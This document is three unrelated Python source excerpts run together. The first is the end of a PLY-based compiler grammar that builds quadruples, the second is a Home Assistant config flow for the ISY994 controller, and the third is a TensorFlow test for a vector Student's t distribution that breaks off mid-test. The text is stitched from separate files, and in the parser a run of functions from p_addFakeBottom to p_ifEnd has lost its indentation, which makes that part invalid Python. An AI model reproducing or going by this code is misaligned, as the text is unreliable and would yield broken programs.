    '''block : LEFTBKT block1 RIGHTBKT'''
def p_write(p):
    '''write : PRINT LEFTPAREN cte RIGHTPAREN SEMICOLON'''
    # print(): resolve the operand address (local > global > constant)
    var = {}
    if p[3] in varLocal.keys():
        var = varLocal[p[3]]
    elif p[3] in varGlobal.keys():
        var = varGlobal[p[3]]
    else:
        var = constants[p[3]]
    addQuadruple('PRINT', '', '', var['dir'])
def p_readg(p):
    '''readg : READ LEFTPAREN ID RIGHTPAREN SEMICOLON'''
    # read(): target must be a declared variable (local shadows global)
    var = {}
    if p[3] in varLocal.keys():
        var = varLocal[p[3]]
    else:
        var = varGlobal[p[3]]
    addQuadruple('READ', '', '', var['dir'])
def p_expression1(p):
    '''expression1 : empty
                | GREATERTHANEQ saveOperation exp
                | LESSTHANEQ saveOperation exp
                | GREATERTHAN saveOperation exp
                | LESSTHAN saveOperation exp
                | EQUAL saveOperation exp
                | DIFFERENT saveOperation exp
                | OR saveOperation exp
                | AND saveOperation exp'''
    # Reduce a pending relational operator into a temp quadruple.
    # NOTE(review): '||'/'&&' are pushed by saveOperation but handled in
    # termEnded/factorEnded, not here — confirm intended precedence split.
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '<' or operationStack[-1] == '>' or operationStack[-1] == '<=' or operationStack[-1] == '>=' or operationStack[-1] == '==' or operationStack[-1] == '!=':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type'], operation, operand2['type'])
            if resultType > 0:
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                # NOTE(review): passes operand dicts to addQuadruple here,
                # while sibling rules pass ['dir'] addresses — confirm.
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar)
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Expression type mismatch')
                exit(1)
            p[0] = tempVar
def p_expression(p):
    '''expression : exp expression1'''
def p_exp1(p):
    '''exp1 : empty
            | PLUS saveOperation exp exp1
            | MINUS saveOperation exp exp1'''
    # Pass the innermost value up the chain
    p[0] = p[1]
    if len(p) > 2:
        p[0] = p[3]
def p_exp(p):
    '''exp : term exp1'''
    p[0] = p[1]
def p_term1(p):
    '''term1 : empty
            | TIMES saveOperation term term1
            | DIVIDE saveOperation term term1'''
def p_term(p):
    '''term : factor term1 termEnded'''
def p_factor1(p):
    '''factor1 : constant
                | PLUS constant
                | MINUS constant'''
    # Push a (possibly signed) constant/operand onto the operand stack.
    global operandStack
    operand = {}
    if len(p) == 3:
        operand = getOperand(p[2])
        if p[1] == '-':
            # Negate by multiplying with the registered constant -1 into a temp
            resultType = getResultType(operand['type']%10, '*', INT)
            tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
            # FIX: pass the operand's address, not the whole operand dict —
            # every other addQuadruple call in this grammar passes 'dir' values.
            addQuadruple('*', constants['-1']['dir'], operand['dir'], tempVar['dir'])
            operand = tempVar
            tempVarCount[resultType] += 1
    else:
        operand = getOperand(p[1])
    operandStack.append(operand)
# Parenthesized sub-expressions get a fake stack bottom so inner operators
# can't be combined with pending outer ones.
def p_factor(p):
    '''factor : LEFTPAREN addFakeBottom expression RIGHTPAREN removeFakeBottom factorEnded
            | factor1 factorEnded'''
def p_statute(p):
    '''statute : call
            | assignement
            | vars
            | condition
            | readg
            | write
            | cycle'''
    # Only `call` propagates a value (the callee's return type); discard
    # unused non-void return values pushed by p_call.
    if p[1] is not None:
        if p[1] != VOID:
            print('Warning: Unused function return value.')
            operandStack.pop()
def p_cycle(p):
    '''cycle : WHILE whileStart LEFTPAREN expression RIGHTPAREN whileCheck block whileEnd'''
def p_call2(p):
    '''call2 : empty
            | COMMA expression addArgument call2'''
    # Per trailing argument: count-check, then emit its PARAM quadruple.
    # NOTE(review): duplicated logic with p_call1 — candidate for a shared helper.
    global argumentCount
    if argumentCount != len(sendParams):
        print('Error: Number of arguments doesn\'t match number of parameters declared')
        exit(1)
    if len(p) == 5:
        argumentCount -= 1
        argument = operandStack.pop()
        parameter = sendParams.pop()
        resultType = getResultType(parameter['type'], '=', argument['type'])
        if resultType > 0:
            addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
        else:
            print('Error: Argument type doesn\'t match the type of the parameter declared')
            exit(1)
def p_call1(p):
    '''call1 : empty
            | expression addArgument call2'''
    # First argument of a call (same checks as p_call2)
    global argumentCount
    if argumentCount != len(sendParams):
        print('Error: Number of arguments doesn\'t match number of parameters declared')
        exit(1)
    if len(p) == 4:
        argument = operandStack.pop()
        parameter = sendParams.pop()
        resultType = getResultType(parameter['type'], '=', argument['type'])
        if resultType > 0:
            addQuadruple('PARAM', argument['dir'], '', parameter['dir'])
        else:
            print('Error: Argument type doesn\'t match the type of the parameter declared')
            exit(1)
def p_call(p):
    '''call : ID prepareParams LEFTPAREN call1 RIGHTPAREN SEMICOLON'''
    # Whole call reduced: reset the argument counter, jump to the function,
    # and expose its return type (pushing the callee entry for non-void).
    # FIX: without `global`, the assignment below created a dead local and the
    # module-level argumentCount was never reset between calls.
    global argumentCount
    argumentCount = 0
    addQuadruple('GOFUNC', '', '', funcGlobal[p[1]]['startQuadruple'])
    if funcGlobal[p[1]]['type'] != VOID:
        operandStack.append(funcGlobal[p[1]])
    p[0] = funcGlobal[p[1]]['type']
def p_prepareParams(p):
    '''prepareParams : empty'''
    # Before parsing arguments: reserve the callee's activation record and
    # load its declared parameter list. p[-1] is the callee's ID token.
    global sendParams
    addQuadruple('MEMORY', '', '', funcGlobal[p[-1]])
    sendParams = funcGlobal[p[-1]]['parameters']
def p_addArgument(p):
    '''addArgument : empty'''
    global argumentCount
    argumentCount += 1
def p_parameters1(p):
    '''parameters1 : empty
                | COMMA type ID addParameter parameters1'''
def p_parameters(p):
    '''parameters : empty
                | type ID addParameter parameters1'''
def p_constant1(p):
    '''constant1 : empty
                | COMMA cte constant1'''
def p_constant(p):
    '''constant : cte
                | LEFTSQBKT cte constant1 RIGHTSQBKT'''
    # Scalar constants propagate their text; array literals yield None here
    if len(p) == 2:
        p[0] = p[1]
def p_cte(p):
    '''cte : ID
        | varArr
        | TRUE
        | FALSE
        | cteN
        | cteS'''
    p[0] = p[1]
def p_cteN(p):
    '''cteN : NUMBERINT addConstant
            | NUMBERFLT addConstant'''
    p[0] = p[1]
def p_cteS(p):
    '''cteS : STRING'''
    # Strip the surrounding quotes and register the string constant once
    cte = p[1]
    if '\"' in cte:
        cte = cte.replace('\"','')
    global constants
    if not cte in constants.keys():
        constants[cte] = {'value':cte, 'type':STRING, 'dir':constVarCount[STRING]}
        constVarCount[STRING] += 1
    p[0] = cte
def p_condition2(p):
    '''condition2 : empty ifEnd
                | ELSE block ifEnd'''
def p_condition1(p):
    '''condition1 : empty
                | ELSEIF LEFTPAREN expression RIGHTPAREN ifStart2 block ifContinue condition1'''
def p_condition(p):
    '''condition : IF LEFTPAREN expression RIGHTPAREN ifStart block ifContinue condition1 condition2'''
def p_assignement2(p):
    '''assignement2 : call
                | expression SEMICOLON'''
    # Right-hand side; a void call cannot be assigned
    if p[1] == VOID:
        print('Error: Cannot assign a function of type void.')
        exit(1)
def p_assignement1(p):
    '''assignement1 : ID
                | varArr'''
    # Left-hand side must be declared (local or global)
    p[0] = p[1]
    if not p[1] in varLocal.keys() and not p[1] in varGlobal.keys():
        print('Error: Cannot assign undeclared variable')
        exit(1)
def p_assignement(p):
    '''assignement : assignement1 ASSIGN assignement2'''
    # Emit the '=' quadruple from the expression result to the target
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    operand = operandStack.pop()
    # %10 folds pointer/array-adjusted type codes back to the base type
    resultType = getResultType(var['type'], '=', operand['type']%10)
    if resultType > 0:
        addQuadruple('=', operand['dir'], '', var['dir'])
    else:
        print('Error: Assignment type mismatch')
        exit(1)
def p_varArr(p):
    '''varArr : ID LEFTSQBKT exp RIGHTSQBKT'''
    # NOTE(review): array indexing only resolves and prints the variable —
    # no indexing quadruples are emitted; support looks unfinished.
    var = {}
    if p[1] in varLocal.keys():
        var = varLocal[p[1]]
    else:
        var = varGlobal[p[1]]
    print('vararr')
    print(var)
def p_type(p):
    '''type : TBOOL addType
            | TINT addType
            | TFLOAT addType
            | TSTRING addType'''
# extra grammar
# Embedded semantic actions: each reduces the `empty` production at a precise
# point in a rule and reads the neighbouring symbol via p[-1].
def p_addVariable(p):
    '''addVariable : empty'''
    # Register the ID just parsed (p[-1]) under the pending declaration type
    global lastVarName
    lastVarName = p[-1]
    variableName = lastVarName
    addVariable(variableName, variableType)
def p_addConstant(p):
    '''addConstant : empty'''
    # Register a numeric literal in the constants table (int vs float by value)
    constType = -1
    cte = num(p[-1])
    if type(cte) is int:
        constType = INT
    else:
        constType = FLOAT
    global constants
    if not str(cte) in constants.keys():
        constants[str(cte)] = {'value':cte, 'type':constType, 'dir':constVarCount[constType]}
        constVarCount[constType] += 1
def p_saveFuncName(p):
    '''saveFuncName : empty'''
    global lastFuncName
    lastFuncName = p[-1]
def p_funcTypeNext(p):
    '''funcTypeNext : empty'''
    # Flag that the next `type` belongs to a function signature, not a variable
    global funcTypeNext
    funcTypeNext = True
def p_saveFuncTypeVoid(p):
    '''saveFuncTypeVoid : empty'''
    global funcType
    funcType = VOID
def p_addParameter(p):
    '''addParameter : empty'''
    # Declare the parameter as a local variable and record it in the signature
    global lastVarName
    global funcParameters
    lastVarName = p[-1]
    variableName = lastVarName
    addVariable(variableName, variableType)
    funcParameters.append(varLocal[variableName])
def p_addType(p):
    '''addType : empty'''
    # Route the parsed type keyword to either the function type or the
    # pending variable declaration type, then clear the flag
    global variableType
    global funcTypeNext
    global funcType
    if funcTypeNext:
        funcType = getTypeValue(p[-1])
    else:
        variableType = getTypeValue(p[-1])
    funcTypeNext = False
def p_saveOperation(p):
    '''saveOperation : empty'''
    # Push the operator token just parsed onto the operation stack
    global operationStack
    operationStack.append(p[-1])
def p_termEnded(p):
    '''termEnded : empty'''
    # After a term: fold a pending additive (or '||') operator into a temp
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '+' or operationStack[-1] == '-' or operationStack[-1] == '||':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type']%10, operation, operand2['type'])
            if resultType > 0:
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Term type mismatch')
                exit(1)
    # NOTE(review): debug leftover — no rule reads termEnded's value
    p[0] = "hio"
def p_factorEnded(p):
    '''factorEnded : empty'''
    # After a factor: fold a pending multiplicative (or '&&') operator
    global operationStack
    global operandStack
    if len(operationStack) > 0:
        if operationStack[-1] == '*' or operationStack[-1] == '/' or operationStack[-1] == '&&':
            operand2 = operandStack.pop()
            operation = operationStack.pop()
            operand1 = operandStack.pop()
            resultType = getResultType(operand1['type']%10, operation, operand2['type'])
            if resultType > 0:
                tempVar = {'dir':tempVarCount[resultType], 'type':resultType}
                addQuadruple(operation, operand1['dir'], operand2['dir'], tempVar['dir'])
                operandStack.append(tempVar)
                tempVarCount[resultType] += 1
            else:
                print('Error: Factor type mismatch')
                exit(1)
def p_addFakeBottom(p):
'''addFakeBottom : empty'''
global operationStack
operationStack.append('(')
def p_removeFakeBottom(p):
'''removeFakeBottom : empty'''
global operationStack
operationStack.pop()
def p_changeToLocalScope(p):
'''changeToLocalScope : empty'''
global scope
scope = 'local'
def p_changeToGlobalScope(p):
'''changeToGlobalScope : empty'''
global scope
scope = 'global'
def p_ifStart(p):
'''ifStart : empty'''
jumpStack.append('IF')
p_ifStart2(p)
def p_ifStart2(p):
'''ifStart2 : empty'''
condition = operandStack.pop()
if condition['type'] == BOOL:
addQuadruple('GOTOF', condition, '', '')
jumpStack.append(len(quadruples)-1)
else:
print('Error: Condition in \'if\' statement must evaluate to a bool.')
exit(1)
def p_ifContinue(p):
'''ifContinue : empty'''
addQuadruple('GOTO', '', '', '')
complete = jumpStack.pop()
jumpStack.append(len(quadruples)-1)
completeQuadruple(complete, len(quadruples))
def p_ifEnd(p):
'''ifEnd : empty'''
while jumpStack[-1] != 'IF':
completeQuadruple(jumpStack.pop(), len(quadruples))
jumpStack.pop()
def p_whileStart(p):
    '''whileStart : empty'''
    # Remember where the loop condition starts so whileEnd can jump back.
    jumpStack.append(len(quadruples))
def p_whileCheck(p):
    '''whileCheck : empty'''
    # Emit the conditional exit jump (GOTOF) for the just-parsed 'while'
    # condition; its target is backpatched by p_whileEnd.
    condition = operandStack.pop()
    if condition['type'] == BOOL:
        # NOTE(review): the whole operand dict is passed here, while other
        # quadruples receive operand['dir'] -- confirm the VM expects this.
        addQuadruple('GOTOF', condition, '', '')
        jumpStack.append(len(quadruples)-1)
    else:
        # Fixed: this error message previously referred to an 'if' statement.
        print('Error: Condition in \'while\' statement must evaluate to a bool.')
        exit(1)
def p_whileEnd(p):
    '''whileEnd : empty'''
    # Jump back to the condition check (index saved by whileStart), then
    # backpatch the exit GOTOF to the first quadruple after the loop.
    complete = jumpStack.pop()
    addQuadruple('GOTO', '', '', jumpStack.pop())
    completeQuadruple(complete, len(quadruples))
def p_jumpToMain(p):
    '''jumpToMain : empty'''
    # Program prologue: emit a GOTO that skips all function bodies; its
    # target is backpatched once main's first quadruple is known.
    addQuadruple('GOTO', '', '', '')
    jumpStack.append(len(quadruples)-1)
def p_completeJumpToMain(p):
    '''completeJumpToMain : empty'''
    # main starts here: backpatch the prologue GOTO emitted by jumpToMain.
    completeQuadruple(jumpStack.pop(), len(quadruples))
def p_funcStart(p):
    '''funcStart : empty'''
    # Register the function being parsed, recording where its code begins.
    addFunction(lastFuncName, funcType, len(quadruples))
def p_funcReturn(p):
    '''funcReturn : empty'''
    # Emit a RETURN quadruple for the value on top of the operand stack,
    # after checking it against the function's declared return type.
    # (Removed leftover debug prints of 'return' and p[-1].)
    value = operandStack.pop()
    if value['type'] == funcGlobal[lastFuncName]['type']:
        addQuadruple('RETURN', '', '', value['dir'])
    else:
        print('Error: Type of return value in function doesn\'t match function\'s declared type.')
        exit(1)
def p_funcEnd(p):
    '''funcEnd : empty'''
    # Finalize the current function: record its parameter list, reset the
    # local/temporary address counters, and emit the ENDFUNC marker.
    # (Removed leftover debug print of the local variable table.)
    funcGlobal[lastFuncName]['parameters'] = funcParameters
    resetLocalCounters()
    addQuadruple('ENDFUNC', '', '', '')
def p_error(p):
    # PLY error hook: report the offending token (or EOF) and abort.
    if p:
        # NOTE(review): prints the whole LexToken object; the trailing
        # comment suggests p.value was once printed instead -- confirm
        # which output is wanted.
        print("Syntax error at '%s'" % p)#p.value)
    else:
        print("Syntax error at EOF")
    exit(1)
import ply.yacc as yacc
# Build the LALR parser from the p_* rules defined above.
yacc.yacc()
#Functions
def addVariable(variable, varType):
    """Declare *variable* with type code *varType* in the current scope.

    Aborts the compiler on a name clash with a function or a duplicate
    declaration in the same scope.
    """
    global varGlobal
    global varLocal
    # A name may not be shared between a function and a variable.
    if variable in funcGlobal.keys():
        print("Variable error: Variable cannot have the same name as a function")
        exit(1)
    if scope == 'global':
        if variable in varGlobal.keys():
            print("Variable error: Variable is already declared globally")
            exit(1)
        varGlobal[variable] = {'name': variable, 'type': varType, 'dir': globalVarCount[varType]}
        globalVarCount[varType] += 1
    else:
        if variable in varLocal.keys():
            print("Variable error: Variable is already declared locally")
            exit(1)
        varLocal[variable] = {'name': variable, 'type': varType, 'dir': localVarCount[varType]}
        localVarCount[varType] += 1
def convertVariableToArray(size):
    # Turn the most recently declared variable (lastVarName) into an array
    # of *size* elements. Multiplying the type code by 11 marks it as an
    # array; elsewhere `type % 10` presumably recovers the base type --
    # TODO confirm against getResultType/the VM.
    global varGlobal
    global varLocal
    if scope == 'global':
        varGlobal[lastVarName]['type'] *= 11
        varGlobal[lastVarName]['size'] = size
    else:
        varLocal[lastVarName]['type'] *= 11
        varLocal[lastVarName]['size'] = size
def addFunction(name, funType, startQuadruple):
    # Register *name* in the global function directory, snapshotting the
    # current local/temporary address counters. For non-void functions
    # (funType != 0) a global address is reserved for the return value.
    global funcGlobal
    if name in varGlobal.keys():
        print("Function error: Function cannot have the same name as a variable")
        exit(1)
    if not name in funcGlobal.keys():
        funcGlobal[name] = {'name':name, 'type':funType, 'startQuadruple':startQuadruple, 'boolCount':localVarCount[BOOL], 'intCount':localVarCount[INT], 'floatCount':localVarCount[FLOAT], 'stringCount':localVarCount[STRING], 'boolTempCount':tempVarCount[BOOL], 'intTempCount':tempVarCount[INT], 'floatTempCount':tempVarCount[FLOAT], 'stringTempCount':tempVarCount[STRING]}
        if funType != 0:
            # Reserve a global slot where the function's result is stored.
            funcGlobal[name]['dir'] = globalVarCount[funType]
            globalVarCount[funType] += 1
    else:
        print("Function error: Function is already declared")
        exit(1)
def addQuadruple(operation, var1, var2, result):
    """Append a quadruple (op, var1, var2, result) to the program listing."""
    global quadruples
    quadruples.append(dict(op=operation, var1=var1, var2=var2, result=result))
def completeQuadruple(index, newValue):
    """Backpatch the jump target of the quadruple at *index*."""
    quad = quadruples[index]
    quad['result'] = newValue
def num(s):
    """Parse *s* as a number: an int when possible, otherwise a float."""
    try:
        return int(s)
    except ValueError:
        pass
    return float(s)
def getOperand(key):
    # Resolve an identifier or literal to its symbol-table entry.
    # Lookup order: constants, then local scope, then global scope.
    # NOTE(review): falls through returning None for undeclared names --
    # callers presumably treat that as an error; confirm.
    if key in constants.keys():
        return constants[key]
    elif key in varLocal.keys():
        return varLocal[key]
    elif key in varGlobal.keys():
        return varGlobal[key]
def resetLocalCounters():
    # Reset the per-function symbol table and the virtual-address counters
    # for locals and temporaries to their per-type base addresses.
    global varLocal
    global funcParameters
    global localVarCount
    global tempVarCount
    varLocal = {}
    funcParameters = []
    # Local variable address ranges, by type.
    localVarCount[BOOL] = 20000
    localVarCount[INT] = 22500
    localVarCount[FLOAT] = 25000
    localVarCount[STRING] = 27500
    # Temporary variable address ranges, by type.
    tempVarCount[BOOL] = 30000
    tempVarCount[INT] = 32500
    tempVarCount[FLOAT] = 35000
    tempVarCount[STRING] = 37500
# Main
if __name__ == '__main__':
    # Check for file
    if (len(sys.argv) > 1):
        file = sys.argv[1]
        # Open file
        try:
            f = open(file, 'r')
            data = f.read()
            f.close()
            # Parse the data
            # NOTE(review): the grammar's start rule presumably returns 'OK'
            # on success; the virtual machine only runs in that case.
            if (yacc.parse(data, tracking = True) == 'OK'):
                print(dirProc);
                executeVirtualMachine(funcGlobal, quadruples, constants)
        except EOFError:
            print(EOFError)
    else:
        print('File missing')
    # Interactive fallback: parse one line at a time until EOF.
    # NOTE(review): raw_input exists only in Python 2; under Python 3 this
    # loop raises NameError (input() would be needed).
    while 1:
        try:
            s = raw_input('')
        except EOFError:
            break
        if not s:
            continue
        yacc.parse(s)
| |
"""Config flow for Universal Devices ISY994 integration."""
import logging
from urllib.parse import urlparse
from pyisy.configuration import Configuration
from pyisy.connection import Connection
import voluptuous as vol
from homeassistant import config_entries, core, exceptions
from homeassistant.components import ssdp
from homeassistant.const import CONF_HOST, CONF_NAME, CONF_PASSWORD, CONF_USERNAME
from homeassistant.core import callback
from .const import (
CONF_IGNORE_STRING,
CONF_RESTORE_LIGHT_STATE,
CONF_SENSOR_STRING,
CONF_TLS_VER,
CONF_VAR_SENSOR_STRING,
DEFAULT_IGNORE_STRING,
DEFAULT_RESTORE_LIGHT_STATE,
DEFAULT_SENSOR_STRING,
DEFAULT_TLS_VERSION,
DEFAULT_VAR_SENSOR_STRING,
DOMAIN,
ISY_URL_POSTFIX,
UDN_UUID_PREFIX,
)
_LOGGER = logging.getLogger(__name__)
def _data_schema(schema_input):
    """Generate the user-step schema, defaulting host from discovery data."""
    fields = {
        vol.Required(CONF_HOST, default=schema_input.get(CONF_HOST, "")): str,
        vol.Required(CONF_USERNAME): str,
        vol.Required(CONF_PASSWORD): str,
        vol.Optional(CONF_TLS_VER, default=DEFAULT_TLS_VERSION): vol.In([1.1, 1.2]),
    }
    return vol.Schema(fields, extra=vol.ALLOW_EXTRA)
async def validate_input(hass: core.HomeAssistant, data):
    """Validate that the user input allows us to connect.

    Data has the keys from DATA_SCHEMA with values provided by the user.
    Returns the config-entry title and the device uuid.
    """
    user = data[CONF_USERNAME]
    password = data[CONF_PASSWORD]
    host = urlparse(data[CONF_HOST])
    tls_version = data.get(CONF_TLS_VER)

    # Derive TLS usage and the default port from the URL scheme.
    if host.scheme == "https":
        https = True
        port = host.port or 443
    elif host.scheme == "http":
        https = False
        port = host.port or 80
    else:
        _LOGGER.error("The isy994 host value in configuration is invalid")
        raise InvalidHost

    # Connect to ISY controller (blocking pyisy call, run in the executor).
    isy_conf = await hass.async_add_executor_job(
        _fetch_isy_configuration,
        host.hostname,
        port,
        user,
        password,
        https,
        tls_version,
        host.path,
    )
    if not isy_conf or "name" not in isy_conf or not isy_conf["name"]:
        raise CannotConnect

    # Return info that you want to store in the config entry.
    return {"title": f"{isy_conf['name']} ({host.hostname})", "uuid": isy_conf["uuid"]}
def _fetch_isy_configuration(
    address, port, username, password, use_https, tls_ver, webroot
):
    """Validate and fetch the configuration from the ISY."""
    # Runs in an executor thread: pyisy's Connection performs blocking I/O.
    try:
        isy_conn = Connection(
            address,
            port,
            username,
            password,
            use_https,
            tls_ver,
            webroot=webroot,
        )
    except ValueError as err:
        # pyisy signals bad credentials with ValueError; surface it as
        # the flow's InvalidAuth, keeping the original message.
        raise InvalidAuth(err.args[0]) from err
    return Configuration(xml=isy_conn.get_config())
class ConfigFlow(config_entries.ConfigFlow, domain=DOMAIN):
    """Handle a config flow for Universal Devices ISY994."""

    VERSION = 1
    CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH

    def __init__(self):
        """Initialize the isy994 config flow."""
        # Host/name prefilled from SSDP discovery, if any.
        self.discovered_conf = {}

    @staticmethod
    @callback
    def async_get_options_flow(config_entry):
        """Get the options flow for this handler."""
        return OptionsFlowHandler(config_entry)

    async def async_step_user(self, user_input=None):
        """Handle the initial step."""
        errors = {}
        info = None
        if user_input is not None:
            try:
                info = await validate_input(self.hass, user_input)
            except CannotConnect:
                errors["base"] = "cannot_connect"
            except InvalidHost:
                errors["base"] = "invalid_host"
            except InvalidAuth:
                errors["base"] = "invalid_auth"
            except Exception: # pylint: disable=broad-except
                _LOGGER.exception("Unexpected exception")
                errors["base"] = "unknown"
            if not errors:
                # De-duplicate entries on the ISY's uuid.
                await self.async_set_unique_id(info["uuid"], raise_on_progress=False)
                self._abort_if_unique_id_configured()
                return self.async_create_entry(title=info["title"], data=user_input)
        return self.async_show_form(
            step_id="user",
            data_schema=_data_schema(self.discovered_conf),
            errors=errors,
        )

    async def async_step_import(self, user_input):
        """Handle import."""
        # Imported YAML config is validated through the regular user step.
        return await self.async_step_user(user_input)

    async def async_step_ssdp(self, discovery_info):
        """Handle a discovered isy994."""
        friendly_name = discovery_info[ssdp.ATTR_UPNP_FRIENDLY_NAME]
        url = discovery_info[ssdp.ATTR_SSDP_LOCATION]
        mac = discovery_info[ssdp.ATTR_UPNP_UDN]
        # Strip the advertised "uuid:" prefix and REST-path suffix to get a
        # bare unique id and a base URL.
        if mac.startswith(UDN_UUID_PREFIX):
            mac = mac[len(UDN_UUID_PREFIX) :]
        if url.endswith(ISY_URL_POSTFIX):
            url = url[: -len(ISY_URL_POSTFIX)]
        await self.async_set_unique_id(mac)
        self._abort_if_unique_id_configured()
        self.discovered_conf = {
            CONF_NAME: friendly_name,
            CONF_HOST: url,
        }
        self.context["title_placeholders"] = self.discovered_conf
        return await self.async_step_user()
class OptionsFlowHandler(config_entries.OptionsFlow):
    """Handle a option flow for isy994."""

    def __init__(self, config_entry: config_entries.ConfigEntry):
        """Initialize options flow."""
        self.config_entry = config_entry

    async def async_step_init(self, user_input=None):
        """Handle options flow."""
        if user_input is not None:
            return self.async_create_entry(title="", data=user_input)

        # Default every field from the currently stored options.
        opts = self.config_entry.options
        options_schema = vol.Schema(
            {
                vol.Optional(
                    CONF_IGNORE_STRING,
                    default=opts.get(CONF_IGNORE_STRING, DEFAULT_IGNORE_STRING),
                ): str,
                vol.Optional(
                    CONF_SENSOR_STRING,
                    default=opts.get(CONF_SENSOR_STRING, DEFAULT_SENSOR_STRING),
                ): str,
                vol.Optional(
                    CONF_VAR_SENSOR_STRING,
                    default=opts.get(
                        CONF_VAR_SENSOR_STRING, DEFAULT_VAR_SENSOR_STRING
                    ),
                ): str,
                vol.Required(
                    CONF_RESTORE_LIGHT_STATE,
                    default=opts.get(
                        CONF_RESTORE_LIGHT_STATE, DEFAULT_RESTORE_LIGHT_STATE
                    ),
                ): bool,
            }
        )
        return self.async_show_form(step_id="init", data_schema=options_schema)
class InvalidHost(exceptions.HomeAssistantError):
    """Error to indicate the host value is invalid."""
    # Raised by validate_input when the host URL lacks an http/https scheme.
class CannotConnect(exceptions.HomeAssistantError):
    """Error to indicate we cannot connect."""
    # Raised by validate_input when no usable configuration is returned.
class InvalidAuth(exceptions.HomeAssistantError):
    """Error to indicate there is invalid auth."""
    # Raised by _fetch_isy_configuration on bad credentials.
| |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for MultivariateStudentsT Distribution."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from scipy import linalg
from scipy import special
from tensorflow.contrib.distributions.python.ops.vector_student_t import _VectorStudentT
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.platform import test
class _FakeVectorStudentT(object):
  """Fake scipy implementation for Multivariate Student's t-distribution.
  Technically we don't need to test the `Vector Student's t-distribution` since
  its composed of only unit-tested parts. However this _FakeVectorStudentT
  serves as something like an end-to-end test of the
  `TransformedDistribution + Affine` API.
  Other `Vector*` implementations need only test new code. That we don't need
  to test every Vector* distribution is good because there aren't SciPy
  analogs and reimplementing everything in NumPy sort of defeats the point of
  having the `TransformedDistribution + Affine` API.
  """

  def __init__(self, df, loc, scale_tril):
    # df: degrees of freedom (scalar or batch of scalars); loc: location
    # vector(s); scale_tril: lower-triangular scale matrix (or batch).
    self._df = np.asarray(df)
    self._loc = np.asarray(loc)
    self._scale_tril = np.asarray(scale_tril)

  def log_prob(self, x):
    # Log-density of x under the affine-transformed Student's t.
    def _compute(df, loc, scale_tril, x):
      k = scale_tril.shape[-1]
      # log|det scale| from the triangular factor's diagonal.
      ildj = np.sum(np.log(np.abs(np.diag(scale_tril))), axis=-1)
      # Log normalization constant of k independent Student's t margins.
      logz = ildj + k * (0.5 * np.log(df) +
                         0.5 * np.log(np.pi) +
                         special.gammaln(0.5 * df) -
                         special.gammaln(0.5 * (df + 1.)))
      # Whiten the samples: y = scale_tril^{-1} (x - loc).
      # NOTE(review): np.matrix is deprecated in modern NumPy -- consider
      # np.atleast_2d; overwrite_b only mutates the temporary matrix.
      y = linalg.solve_triangular(scale_tril, np.matrix(x - loc).T,
                                  lower=True, overwrite_b=True)
      logs = -0.5 * (df + 1.) * np.sum(np.log1p(y**2. / df), axis=-2)
      return logs - logz
    if not self._df.shape:
      # Scalar batch: a single parameter set.
      return _compute(self._df, self._loc, self._scale_tril, x)
    # Batched parameters: evaluate each batch member independently.
    return np.concatenate([
        [_compute(self._df[i], self._loc[i], self._scale_tril[i], x[:, i, :])]
        for i in range(len(self._df))]).T

  def prob(self, x):
    # Density is exp of the log-density.
    return np.exp(self.log_prob(x))
class VectorStudentTTest(test.TestCase):
  """Compares _VectorStudentT against the NumPy/SciPy reference above."""

  def setUp(self):
    # Fixed seed so the sampled evaluation points are reproducible.
    self._rng = np.random.RandomState(42)

  def testProbStaticScalar(self):
    """Scalar batch of parameters with statically known shapes."""
    with self.cached_session():
      # Scalar batch_shape.
      df = np.asarray(3., dtype=np.float32)
      # Scalar batch_shape.
      loc = np.asarray([1], dtype=np.float32)
      scale_diag = np.asarray([2.], dtype=np.float32)
      scale_tril = np.diag(scale_diag)
      expected_mst = _FakeVectorStudentT(
          df=df, loc=loc, scale_tril=scale_tril)
      actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
                                   validate_args=True)
      x = 2. * self._rng.rand(4, 1).astype(np.float32) - 1.
      self.assertAllClose(expected_mst.log_prob(x),
                          actual_mst.log_prob(x).eval(),
                          rtol=0., atol=1e-5)
      self.assertAllClose(expected_mst.prob(x),
                          actual_mst.prob(x).eval(),
                          rtol=0., atol=1e-5)

  def testProbStatic(self):
    """Non-scalar batch of parameters with statically known shapes."""
    # Non-scalar batch_shape.
    df = np.asarray([1., 2, 3], dtype=np.float32)
    # Non-scalar batch_shape.
    loc = np.asarray([[0., 0, 0],
                      [1, 2, 3],
                      [1, 0, 1]],
                     dtype=np.float32)
    scale_diag = np.asarray([[1., 2, 3],
                             [2, 3, 4],
                             [4, 5, 6]],
                            dtype=np.float32)
    scale_tril = np.concatenate([[np.diag(scale_diag[i])]
                                 for i in range(len(scale_diag))])
    x = 2. * self._rng.rand(4, 3, 3).astype(np.float32) - 1.
    expected_mst = _FakeVectorStudentT(
        df=df, loc=loc, scale_tril=scale_tril)
    with self.cached_session():
      actual_mst = _VectorStudentT(df=df, loc=loc, scale_diag=scale_diag,
                                   validate_args=True)
